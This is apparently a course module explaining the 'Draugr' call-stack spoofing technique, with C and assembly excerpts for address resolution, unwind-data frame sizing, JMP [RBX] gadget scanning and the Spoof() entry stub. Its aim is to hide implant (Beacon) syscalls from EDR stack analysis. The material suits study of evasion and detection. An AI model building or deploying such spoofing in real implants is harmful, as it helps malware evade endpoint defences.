Module 5: The Spoof Assembly Routine
Five phases orchestrate the entire stack spoof — from address resolution to cleanup and return.
Module Overview
Draugr's core logic is distributed across five distinct phases. Each phase has a single responsibility: resolve addresses, calculate frame sizes, find a code gadget, build the synthetic stack and execute, then clean up. Understanding these phases is the key to understanding how every piece of the system fits together. This module covers the orchestration layer — the next modules will dive deep into the frame construction (Module 6) and the return mechanism (Module 7).
The Five-Phase Execution Model
Every Draugr syscall passes through five phases in strict order. If any phase fails, the syscall cannot proceed safely. The macro DRAUGR_SYSCALL triggers this entire pipeline.
Five-Phase Pipeline: DraugrInit → CalcStackSize → FindGadget → Spoof() ASM → Fixup
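The strict ordering and stop-on-first-failure rule can be sketched as a loop over a phase table. This illustrates the control flow only and is not Draugr's code: `pipeline_ctx`, `stub_phase` and `run_pipeline` are hypothetical names, and every table entry calls the same stub in place of the real phase (in Draugr, Spoof and Fixup are assembly, not C functions returning a flag).

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical context: lets the demo force a failure at a chosen phase. */
typedef struct {
    int fail_at;    /* 1-based phase number that should fail; 0 = none */
    int current;    /* phase number currently executing */
    int completed;  /* how many phases finished successfully */
} pipeline_ctx;

typedef bool (*phase_fn)(pipeline_ctx *ctx);

/* Stand-in for a real phase: succeeds unless it is the designated failure. */
bool stub_phase(pipeline_ctx *ctx)
{
    if (ctx->current == ctx->fail_at)
        return false;
    ctx->completed++;
    return true;
}

/* Names mirror the five phases; every entry uses the stub in this sketch. */
static const struct {
    const char *name;
    phase_fn    run;
} kPhases[] = {
    { "DraugrInit",    stub_phase },
    { "CalcStackSize", stub_phase },
    { "FindGadget",    stub_phase },
    { "Spoof() ASM",   stub_phase },
    { "Fixup",         stub_phase },
};

/* Runs the phases strictly in order. Returns 0 on success, otherwise the
   1-based number of the first phase that failed; later phases never run. */
int run_pipeline(pipeline_ctx *ctx)
{
    size_t n = sizeof kPhases / sizeof kPhases[0];
    for (size_t i = 0; i < n; i++) {
        ctx->current = (int)i + 1;
        if (!kPhases[i].run(ctx))
            return ctx->current;
    }
    return 0;
}
```

Because the loop returns as soon as a phase reports failure, no later phase ever runs against incomplete data, which is the property the pipeline depends on.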
Phase Summary
| Phase | Function | Responsibility |
|---|---|---|
| 1 | DraugrInit | Resolve three key addresses: BaseThreadInitThunk+0x14, RtlUserThreadStart+0x21, and kernelbase.dll base |
| 2 | DraugrCalculateStackSize | Parse UNWIND_CODE arrays for both functions to determine exact frame sizes in bytes |
| 3 | DraugrFindGadget | Scan kernelbase.dll .text section for a JMP [RBX] gadget (bytes 0xFF 0x23) |
| 4 | Spoof() | Assembly routine: build three-layer synthetic stack, set up registers, execute syscall |
| 5 | Fixup | Deallocate synthetic frames, restore non-volatile registers, return to original caller |
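Phase 3 in the table is, at its core, a byte-pattern search. The sketch below looks for the two-byte encoding of `jmp qword ptr [rbx]` (0xFF 0x23) in a buffer. It assumes the caller has already located the bounds of kernelbase.dll's .text section (PE header parsing is omitted), and `find_pattern` and `find_jmp_rbx` are hypothetical helpers, not DraugrFindGadget itself.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* JMP r/m64 is opcode FF /4; ModRM 0x23 = mod 00, reg 100 (/4), rm 011 (RBX). */
const uint8_t kJmpRbx[2] = { 0xFF, 0x23 };

/* Returns the offset of the first occurrence of pattern[0..pat_len) in
   buf[0..buf_len), or -1 if it is absent. A naive scan is fine for 2 bytes. */
long find_pattern(const uint8_t *buf, size_t buf_len,
                  const uint8_t *pattern, size_t pat_len)
{
    if (pat_len == 0 || pat_len > buf_len)
        return -1;
    for (size_t i = 0; i + pat_len <= buf_len; i++) {
        if (memcmp(buf + i, pattern, pat_len) == 0)
            return (long)i;
    }
    return -1;
}

/* Scans a copy of a .text section for the JMP [RBX] gadget bytes. */
long find_jmp_rbx(const uint8_t *text, size_t text_len)
{
    return find_pattern(text, text_len, kJmpRbx, sizeof kJmpRbx);
}
```

A match does not have to fall on an instruction boundary of the original code: execution that starts at the returned address decodes those two bytes as JMP [RBX] regardless of what surrounds them.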
Phase 1: DraugrInit — Address Resolution
Before any stack spoofing can happen, Draugr must resolve three specific addresses. These addresses form the foundation of the entire fake call stack.
The Three Target Addresses
| Target | Why This Specific Address |
|---|---|
| kernel32!BaseThreadInitThunk + 0x14 | Points to the instruction immediately after a CALL inside the function, i.e. a genuine return site. When the stack unwinder encounters this as a return address, it follows the unwind metadata for BaseThreadInitThunk and sees a legitimate call site. |
| ntdll!RtlUserThreadStart + 0x21 | Points to the instruction immediately after a CALL inside the function. RtlUserThreadStart is the bottom of a normal Windows thread's call stack: the function the OS calls to start a thread. |
| kernelbase.dll base address | Needed for Phase 3 (gadget scanning). The JMP [RBX] gadget is found by scanning the .text section of this DLL. |
Why These Offsets?
The offsets +0x14 and +0x21 are not arbitrary. Each one lands on the instruction immediately following an existing CALL instruction in its function, which is exactly where a real return address points. When an EDR's stack walker encounters these as return addresses, it can check the bytes just before them for a CALL instruction and find a real one. If the return address pointed to the function entry instead, there would be no preceding CALL and the frame would be flagged as suspicious. The offsets therefore make the fake return addresses look like genuine return sites from legitimate function calls. Because they depend on the instruction layout of the specific kernel32.dll and ntdll.dll builds, they are not guaranteed to hold across Windows versions.
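The backward check described above can be sketched as follows. This is a simplified, hypothetical version of the heuristic (real stack-analysis tools differ and recognize more encodings): `preceded_by_call` only knows `call rel32` (E8), `call [rip+disp32]` (FF 15) and register calls (FF D0-D7, or 41 FF D0-D7 for R8-R15). Because it only inspects raw bytes, it can produce false positives.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Returns true if the bytes just before code[ret_off] match one of a few
   common x64 CALL encodings. `code` is a copy of the module's bytes and
   `ret_off` is the return address expressed as an offset into it. */
bool preceded_by_call(const uint8_t *code, size_t ret_off)
{
    /* call rel32: E8 xx xx xx xx (5 bytes) */
    if (ret_off >= 5 && code[ret_off - 5] == 0xE8)
        return true;
    /* call qword ptr [rip+disp32]: FF 15 xx xx xx xx (6 bytes) */
    if (ret_off >= 6 && code[ret_off - 6] == 0xFF && code[ret_off - 5] == 0x15)
        return true;
    /* call r8..r15: 41 FF D0+r (3 bytes) */
    if (ret_off >= 3 && code[ret_off - 3] == 0x41 && code[ret_off - 2] == 0xFF &&
        (code[ret_off - 1] & 0xF8) == 0xD0)
        return true;
    /* call rax..rdi: FF D0+r (2 bytes) */
    if (ret_off >= 2 && code[ret_off - 2] == 0xFF &&
        (code[ret_off - 1] & 0xF8) == 0xD0)
        return true;
    return false;
}
```

A return address at a function's entry (offset 0) has no bytes before it in the function, so the check fails, which is why a return site just past a real CALL is needed.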
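C - DraugrInit (simplified)
```c
#include <windows.h>

BOOL DraugrInit(PDRAUGR_CONFIG config) {
    // Resolve kernel32!BaseThreadInitThunk; +0x14 is the return site
    // just past a CALL inside the function (build-specific offset)
    HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
    if (!hKernel32) return FALSE;
    FARPROC pBaseThreadInit = GetProcAddress(hKernel32, "BaseThreadInitThunk");
    if (!pBaseThreadInit) return FALSE;
    config->BaseThreadInitThunk_Addr = (ULONG_PTR)pBaseThreadInit + 0x14;

    // Resolve ntdll!RtlUserThreadStart; +0x21 is likewise a return site
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) return FALSE;
    FARPROC pRtlUserThread = GetProcAddress(hNtdll, "RtlUserThreadStart");
    if (!pRtlUserThread) return FALSE;
    config->RtlUserThreadStart_Addr = (ULONG_PTR)pRtlUserThread + 0x21;

    // Resolve kernelbase.dll base for gadget scanning (Phase 3)
    HMODULE hKernelBase = GetModuleHandleA("kernelbase.dll");
    if (!hKernelBase) return FALSE;
    config->KernelBase_Addr = (ULONG_PTR)hKernelBase;
    return TRUE;
}
```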
Every Thread Looks the Same
On Windows, threads started through the normal kernel32 thread-creation path begin with the same bottom two frames: RtlUserThreadStart calls BaseThreadInitThunk, which calls the thread's entry point. By fabricating these exact frames, Draugr's fake stack matches the shape of a real thread's call stack, and an EDR performing stack analysis sees the standard Windows thread initialization chain.
Phase 2: Stack Size Calculation
Each synthetic frame must be exactly the right size. If the frame for BaseThreadInitThunk is even one byte off, the stack unwinder will misalign and produce garbage frames. Draugr calculates these sizes by parsing the same UNWIND_CODE metadata that Windows uses internally.
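To see why an exact size matters, the sketch below models a stack as an array of 8-byte slots and walks it the way a size-based unwinder would: each frame's return address sits in its last slot, and the caller's frame begins right after it. It is a deliberately simplified model (no frame pointers, no UWOP_SET_FPREG handling), and `walk_frames` is a hypothetical helper.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified unwind model. Starting at slot 0 (the current RSP), frame i
   spans frame_sizes[i] bytes, including the 8-byte return address in its
   final slot. Writes up to nframes return addresses into out_ret (which must
   hold nframes entries) and returns how many were read. */
size_t walk_frames(const uint64_t *stack, size_t stack_slots,
                   const uint32_t *frame_sizes, size_t nframes,
                   uint64_t *out_ret)
{
    size_t rsp = 0;      /* byte offset of the current frame's base */
    size_t found = 0;
    for (size_t i = 0; i < nframes; i++) {
        uint32_t size = frame_sizes[i];
        if (size < 8 || size % 8 != 0)
            break;                               /* malformed frame size */
        size_t ret_slot = (rsp + size - 8) / 8;  /* last slot of the frame */
        if (ret_slot >= stack_slots)
            break;                               /* would read past the stack */
        out_ret[found++] = stack[ret_slot];
        rsp += size;                             /* caller's RSP after return */
    }
    return found;
}
```

With correct sizes the walk lands on each planted return address; if the first size is off by a single 8-byte slot, every later read is shifted and both recovered "return addresses" are garbage, which is the misalignment described above.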
Step 1: Get RUNTIME_FUNCTION
DraugrWrapperStackSize calls RtlLookupFunctionEntry to retrieve the RUNTIME_FUNCTION structure for the target function. This structure points to the function's UNWIND_INFO, which contains the UNWIND_CODE array.
C - DraugrWrapperStackSize
```c
DWORD DraugrWrapperStackSize(ULONG_PTR functionAddr) {
    DWORD64 imageBase = 0;
    // RtlLookupFunctionEntry retrieves the RUNTIME_FUNCTION
    // for any address within a non-leaf x64 function
    PRUNTIME_FUNCTION pRuntimeFunc = RtlLookupFunctionEntry(
        (DWORD64)functionAddr,
        &imageBase,
        NULL  // HistoryTable - not needed
    );
    // No entry: leaf function or address outside any loaded image
    if (!pRuntimeFunc) return 0;
    // Parse the UNWIND_INFO to calculate total frame size
    return DraugrCalculateStackSize((ULONG_PTR)imageBase, pRuntimeFunc);
}
```
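Conceptually, RtlLookupFunctionEntry maps an address to its RUNTIME_FUNCTION by searching the image's exception directory (.pdata), whose entries are sorted by BeginAddress. The portable sketch below reproduces only that search step over an array of RVAs; the real routine also finds the owning module and handles dynamically registered function tables. `RuntimeFunction` and `lookup_function_entry` are hypothetical names whose fields mirror the documented RUNTIME_FUNCTION layout.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirrors the documented x64 RUNTIME_FUNCTION layout (all fields are RVAs). */
typedef struct {
    uint32_t BeginAddress;
    uint32_t EndAddress;        /* exclusive */
    uint32_t UnwindInfoAddress;
} RuntimeFunction;

/* Binary search for the entry whose [BeginAddress, EndAddress) contains rva
   (rva = address - image base). `table` must be sorted by BeginAddress.
   Returns NULL when no entry covers rva, e.g. for leaf functions. */
const RuntimeFunction *lookup_function_entry(const RuntimeFunction *table,
                                             size_t count, uint32_t rva)
{
    size_t lo = 0, hi = count;
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (rva < table[mid].BeginAddress)
            hi = mid;
        else if (rva >= table[mid].EndAddress)
            lo = mid + 1;
        else
            return &table[mid];
    }
    return NULL;
}
```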
Step 2: Parse UNWIND_CODEs
DraugrCalculateStackSize iterates through the UNWIND_CODE array and accumulates the total bytes that the function's prologue allocates on the stack. Each opcode type contributes a different amount.
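C - DraugrCalculateStackSize (core logic)
```c
// Assumes UNWIND_INFO, UNWIND_CODE and the UWOP_* constants are defined
// to match the documented x64 unwind data layout.
DWORD DraugrCalculateStackSize(ULONG_PTR imageBase,
                               PRUNTIME_FUNCTION pFunc)
{
    DWORD totalSize = 0;
    // Get UNWIND_INFO from RUNTIME_FUNCTION
    PUNWIND_INFO pUnwindInfo = (PUNWIND_INFO)(
        imageBase + pFunc->UnwindInfoAddress
    );
    DWORD i = 0;
    while (i < pUnwindInfo->CountOfCodes) {
        UNWIND_CODE code = pUnwindInfo->UnwindCode[i];
        switch (code.UnwindOp) {
        case UWOP_PUSH_NONVOL:        // push reg
            totalSize += 8;           // Each push = 8 bytes on x64
            i += 1;
            break;
        case UWOP_ALLOC_SMALL:        // sub rsp, N (8..128)
            totalSize += (code.OpInfo * 8) + 8;
            i += 1;
            break;
        case UWOP_ALLOC_LARGE:        // sub rsp, N (large)
            if (code.OpInfo == 0) {
                // Next slot contains size / 8
                totalSize += pUnwindInfo->UnwindCode[i + 1].FrameOffset * 8;
                i += 2;
            } else {
                // Next TWO slots contain raw 32-bit size
                totalSize += *(DWORD *)&pUnwindInfo->UnwindCode[i + 1];
                i += 3;
            }
            break;
        case UWOP_SAVE_NONVOL:        // mov [rsp+N], reg: no allocation,
        case UWOP_SAVE_XMM128:        // but the offset takes 1 extra slot
            i += 2;
            break;
        case UWOP_SAVE_NONVOL_FAR:    // 32-bit offset takes 2 extra slots
        case UWOP_SAVE_XMM128_FAR:
            i += 3;
            break;
        default:                      // e.g. UWOP_SET_FPREG: 1 slot, no allocation
            i += 1;                   // (UWOP_PUSH_MACHFRAME is not handled here)
            break;
        }
    }
    // Handle chained unwind info (UNW_FLAG_CHAININFO): the chained
    // RUNTIME_FUNCTION follows the UNWIND_CODE array, which is padded
    // to an even number of slots
    if (pUnwindInfo->Flags & UNW_FLAG_CHAININFO) {
        DWORD chainIdx = (pUnwindInfo->CountOfCodes + 1) & ~1u;
        PRUNTIME_FUNCTION pChained =
            (PRUNTIME_FUNCTION)&pUnwindInfo->UnwindCode[chainIdx];
        // The recursive call already adds the 8-byte return address;
        // subtract it so the return address is counted only once
        totalSize += DraugrCalculateStackSize(imageBase, pChained) - 8;
    }
    // Add 8 bytes for the return address pushed by CALL
    totalSize += 8;
    return totalSize;
}
```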
UNWIND_CODE Opcode Reference
| Opcode | Meaning | Stack Contribution |
|---|---|---|
| UWOP_PUSH_NONVOL | push reg (e.g., push rbp) | +8 bytes (1 slot) |
| UWOP_ALLOC_SMALL | sub rsp, N where 8 ≤ N ≤ 128 | +(OpInfo * 8) + 8 bytes (1 slot) |
| UWOP_ALLOC_LARGE | sub rsp, N where N > 128 | OpInfo 0: next slot * 8 (2 slots total); OpInfo 1: next two slots as a raw 32-bit size (3 slots total) |
| UWOP_SET_FPREG | lea rbp, [rsp+N] | 0 bytes (sets frame pointer, no allocation; 1 slot) |
| UWOP_SAVE_NONVOL | mov [rsp+N], reg | 0 bytes (saves register, no allocation; 2 slots) |
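The opcode table translates directly into a decoder. The portable sketch below reads a raw UNWIND_CODE byte array in the documented x64 layout (byte 0 of each slot is CodeOffset; in byte 1 the low nibble is UnwindOp and the high nibble is OpInfo) and advances by each opcode's slot count. `frame_size_from_codes` is a hypothetical name; chained unwind info and UWOP_PUSH_MACHFRAME are deliberately left out, and unsupported codes return -1 instead of being skipped.

```c
#include <stddef.h>
#include <stdint.h>

/* Reads UNWIND_CODE slot i as a little-endian 16-bit value. */
static uint32_t slot16(const uint8_t *codes, size_t i)
{
    return (uint32_t)codes[2 * i] | ((uint32_t)codes[2 * i + 1] << 8);
}

/* Sums the stack bytes described by `count` slots (CountOfCodes) and adds 8
   for the return address. Returns -1 for truncated input or for opcodes this
   sketch does not handle (e.g. UWOP_PUSH_MACHFRAME = 10). */
int64_t frame_size_from_codes(const uint8_t *codes, size_t count)
{
    int64_t total = 0;
    size_t i = 0;
    while (i < count) {
        unsigned op     = codes[2 * i + 1] & 0x0F;  /* UnwindOp: low nibble  */
        unsigned opinfo = codes[2 * i + 1] >> 4;    /* OpInfo: high nibble   */

        /* Slots consumed by this opcode, per the x64 unwind-code docs. */
        size_t slots = 1;
        if (op == 1)                    /* UWOP_ALLOC_LARGE */
            slots = (opinfo == 0) ? 2 : 3;
        else if (op == 4 || op == 8)    /* UWOP_SAVE_NONVOL, UWOP_SAVE_XMM128 */
            slots = 2;
        else if (op == 5 || op == 9)    /* the _FAR variants */
            slots = 3;
        if (i + slots > count)
            return -1;                  /* truncated array */

        switch (op) {
        case 0:                         /* UWOP_PUSH_NONVOL */
            total += 8;
            break;
        case 1:                         /* UWOP_ALLOC_LARGE */
            if (opinfo == 0)
                total += (int64_t)slot16(codes, i + 1) * 8;
            else if (opinfo == 1)
                total += (int64_t)(slot16(codes, i + 1) |
                                   (slot16(codes, i + 2) << 16));
            else
                return -1;
            break;
        case 2:                         /* UWOP_ALLOC_SMALL */
            total += (int64_t)opinfo * 8 + 8;
            break;
        case 3: case 4: case 5: case 8: case 9:
            break;                      /* SET_FPREG / SAVE_*: no allocation */
        default:
            return -1;                  /* unsupported or reserved opcode */
        }
        i += slots;
    }
    return total + 8;                   /* return address pushed by CALL */
}
```

The first test below encodes `push rbx; sub rsp, 0x20` (32 + 8 + 8 = 48 bytes). The second shows why slot counts matter: a decoder that stepped one slot at a time would land on the UWOP_SAVE_NONVOL offset slot (0x50, 0x00), decode it as UWOP_PUSH_NONVOL, and report 8 bytes too many.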
Chained Unwind Info
Some functions have chained unwind info (the UNW_FLAG_CHAININFO flag). This means the function's unwind data is split across multiple RUNTIME_FUNCTION entries. Draugr handles this by recursively calling DraugrCalculateStackSize on the chained entry. If it didn't, the calculated frame size would be too small, and the stack unwinder would misalign when walking past the synthetic frame.
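Locating the chained entry is plain arithmetic on the documented UNWIND_INFO layout: a 4-byte header (version/flags, prolog size, code count, frame register/offset), then CountOfCodes two-byte slots padded to an even count, then the chained RUNTIME_FUNCTION. A minimal sketch, with `chained_entry_offset` as a hypothetical helper:

```c
#include <stddef.h>

/* Byte offset of the chained RUNTIME_FUNCTION from the start of UNWIND_INFO:
   4-byte header + UNWIND_CODE array rounded up to an even number of slots. */
size_t chained_entry_offset(unsigned count_of_codes)
{
    size_t padded = ((size_t)count_of_codes + 1) & ~(size_t)1;
    return 4 + padded * 2;
}
```

For example, a function with three unwind codes has its chained entry at byte 12, after one padding slot; this is the same address as `&UnwindCode[(CountOfCodes + 1) & ~1]`.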
The PRM (Parameter) Structure
The PRM structure is the central data package passed between the C orchestration code and the Spoof assembly routine. It carries everything the assembly needs to build the synthetic stack, execute the syscall, and clean up afterward.
PRM Structure Layout
Why Fixup at Offset 0x00?
The first field of PRM is the Fixup address, and that placement is deliberate. After the syscall returns, execution reaches the JMP [RBX] gadget while RBX still points to the PRM structure. JMP [RBX] reads the 8-byte value stored at [RBX + 0], which is the Fixup address, and jumps there. With Fixup at offset zero, the gadget redirects execution to the cleanup routine without any offset arithmetic.
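The effect of putting Fixup first can be shown in portable C. The struct below uses only the offsets this module states (Fixup at 0x00, OG_retaddr at 0x08, saved registers at 0x10-0x38); the remaining PRM fields are omitted, `PrmSketch`, `jump_through_anchor` and `demo_fixup` are illustrative names, and `uint64_t` stands in for pointer-sized fields on x64. Converting a pointer to the struct into a pointer to its first member and calling through it is the C analogue of `jmp [rbx]` (the real gadget jumps, so no return address is pushed).

```c
#include <stddef.h>
#include <stdint.h>

typedef void (*fixup_fn)(void);

/* Partial, illustrative PRM: only the fields whose offsets the text gives. */
typedef struct {
    fixup_fn Fixup;       /* 0x00: target of jmp [rbx] */
    uint64_t OG_retaddr;  /* 0x08: caller's original return address */
    uint64_t saved_rdi;   /* 0x10 */
    uint64_t saved_rsi;   /* 0x18 */
    uint64_t saved_r12;   /* 0x20 */
    uint64_t saved_r13;   /* 0x28 */
    uint64_t saved_r14;   /* 0x30 */
    uint64_t saved_r15;   /* 0x38 */
} PrmSketch;

/* Compile-time checks that the layout matches the stated offsets (x64). */
_Static_assert(sizeof(fixup_fn) == 8, "sketch assumes 8-byte pointers");
_Static_assert(offsetof(PrmSketch, Fixup) == 0x00, "Fixup must be first");
_Static_assert(offsetof(PrmSketch, OG_retaddr) == 0x08, "OG_retaddr");
_Static_assert(offsetof(PrmSketch, saved_rdi) == 0x10, "saved_rdi");
_Static_assert(offsetof(PrmSketch, saved_r15) == 0x38, "saved_r15");

int g_fixup_calls = 0;

/* Stand-in for the real Fixup routine. */
void demo_fixup(void) { g_fixup_calls++; }

/* With rbx = &prm: read the pointer-sized value at offset 0 and transfer
   control to it. No offset arithmetic is needed because Fixup is first. */
void jump_through_anchor(const void *rbx)
{
    fixup_fn target = *(const fixup_fn *)rbx;
    target();
}
```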
Register Preservation
The x64 Windows calling convention designates RBX, RBP, RDI, RSI, RSP, R12-R15 and XMM6-XMM15 as non-volatile (callee-saved). Any function that modifies these registers must restore them before returning. Because the Spoof routine rewrites the stack and much of the register state, it must save and restore every non-volatile register it touches.
Non-Volatile Register Save
At the very beginning of the Spoof routine, the following registers are saved into the PRM structure. RBX is absent from this table even though it is also non-volatile: Spoof repurposes it as the PRM anchor, so the caller's RBX value must be preserved as well (that step is not shown in this simplified excerpt).
| Register | PRM Offset | Why It Must Be Saved |
|---|---|---|
| RDI | 0x10 | Callee-saved; used internally by Spoof for memory operations |
| RSI | 0x18 | Callee-saved; may be used as a source pointer |
| R12 | 0x20 | Callee-saved; available as scratch within Spoof |
| R13 | 0x28 | Callee-saved; available as scratch within Spoof |
| R14 | 0x30 | Callee-saved; available as scratch within Spoof |
| R15 | 0x38 | Callee-saved; available as scratch within Spoof |
ASM - Spoof() entry (from Stub.s)
```asm
Spoof:
    ; RCX = pointer to PRM structure (first argument on x64 Windows)
    ; NOTE: RBX is non-volatile; the caller's RBX must be saved before
    ; it is overwritten here (that save is omitted from this excerpt)
    mov rbx, rcx              ; RBX = &PRM (persists across syscall)
    ; Save the original return address
    mov rax, [rsp]            ; RAX = return address on stack
    mov [rbx + 0x08], rax     ; PRM.OG_retaddr = return address
    ; Save the other non-volatile registers Spoof uses into PRM
    mov [rbx + 0x10], rdi     ; PRM.saved_rdi
    mov [rbx + 0x18], rsi     ; PRM.saved_rsi
    mov [rbx + 0x20], r12     ; PRM.saved_r12
    mov [rbx + 0x28], r13     ; PRM.saved_r13
    mov [rbx + 0x30], r14     ; PRM.saved_r14
    mov [rbx + 0x38], r15     ; PRM.saved_r15
    ; ... Phase 4 continues: build synthetic stack ...
```
Why RBX Is the Anchor
RBX is a non-volatile register in the x64 calling convention. The Nt* syscall stub is called like any other function, so the kernel's system-call path must hand RBX back unchanged; the syscall instruction itself only overwrites RCX and R11, and RAX carries the NTSTATUS result. After the syscall returns, RBX therefore still points to the PRM structure. This is why the JMP [RBX] gadget works: it can always find the Fixup address through the preserved RBX pointer, regardless of what the kernel did during the call.
What Happens If Registers Are Not Restored?
If the Fixup routine fails to restore the non-volatile registers, the calling function will use corrupted values. The C compiler assumes that callee-saved registers are unchanged after a function call. Corrupted RDI, RSI, or R12-R15 would cause silent data corruption, wrong loop counters, invalid pointer dereferences, or outright crashes in the Beacon code that called the Draugr syscall.
Putting It All Together
Here is the complete data flow from the DRAUGR_SYSCALL macro to the Spoof assembly entry point:
Data Flow: C to Assembly (DRAUGR_SYSCALL macro expands → DraugrCall fills PRM struct → Spoof() receives RCX = &PRM → 3-layer synthetic stack → syscall kernel transition)
DraugrCall: The Packager
DraugrCall is the final C function before entering assembly. It populates every field of the PRM structure with data gathered from Phases 1–3, sets the SSN and the syscall instruction address, and copies all function arguments into the PRM. It then calls Spoof(&PRM), passing the structure pointer in RCX (the first argument register on x64 Windows).
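C - DraugrCall (simplified)
```c
#include <windows.h>
#include <stdarg.h>

extern NTSTATUS Spoof(PRM *prm);  // assembly entry point (Stub.s)
extern void Fixup(void);          // cleanup routine, assumed to live beside Spoof

NTSTATUS DraugrCall(PDRAUGR_CONFIG config, PVX_TABLE_ENTRY entry,
                    DWORD argc, ...)
{
    PRM prm = { 0 };
    // Refuse argument counts that would overflow PRM.args
    if (argc > ARRAYSIZE(prm.args))
        return (NTSTATUS)0xC000000DL;  // STATUS_INVALID_PARAMETER
    // Phase 1 results
    prm.BaseThreadInitThunk_Addr = config->BaseThreadInitThunk_Addr;
    prm.RtlUserThreadStart_Addr = config->RtlUserThreadStart_Addr;
    // Phase 2 results
    prm.BaseThreadInitThunk_Size = config->BaseThreadInitThunk_FrameSize;
    prm.RtlUserThreadStart_Size = config->RtlUserThreadStart_FrameSize;
    // Phase 3 result
    prm.Gadget = config->GadgetAddr;
    // SSN and syscall address from VxTable
    prm.SSN = entry->wSSN;
    prm.SyscallAddr = entry->pSyscallAddr;
    // Fixup routine address (must end up at offset 0x00)
    prm.Fixup = (ULONG_PTR)&Fixup;
    // Copy function arguments into PRM; every variadic argument must be
    // passed as a pointer-sized value (cast to ULONG_PTR at the call site)
    va_list args;
    va_start(args, argc);
    for (DWORD i = 0; i < argc; i++) {
        prm.args[i] = va_arg(args, ULONG_PTR);
    }
    va_end(args);
    // Enter the assembly routine: &prm is passed in RCX
    return Spoof(&prm);
}
```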
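The argument-copy loop is the one place in DraugrCall where a caller-supplied count drives writes into a fixed-size array, so it needs an explicit bound. The portable sketch below isolates that step. `pack_args` is a hypothetical helper, `uintptr_t` stands in for ULONG_PTR, and it assumes, as DraugrCall does, that every variadic argument was passed as a pointer-sized integer.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>

/* Copies argc pointer-sized variadic arguments into out[0..cap). Returns
   argc on success, or -1 (copying nothing) if argc exceeds cap. Callers
   must pass each argument as uintptr_t: passing a plain int through `...`
   and reading it back as uintptr_t is undefined behaviour. */
int pack_args(uintptr_t *out, size_t cap, unsigned argc, ...)
{
    if (argc > cap)
        return -1;
    va_list ap;
    va_start(ap, argc);
    for (unsigned i = 0; i < argc; i++)
        out[i] = va_arg(ap, uintptr_t);
    va_end(ap);
    return (int)argc;
}
```

Checking the count before `va_start` means an oversized request is rejected without touching the destination array at all.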
Module 5 Quiz: The Spoof Assembly Routine
Q1: Why are the offsets +0x14 and +0x21 chosen for BaseThreadInitThunk and RtlUserThreadStart respectively?
Q2: Why is the Fixup address stored at offset 0x00 in the PRM structure?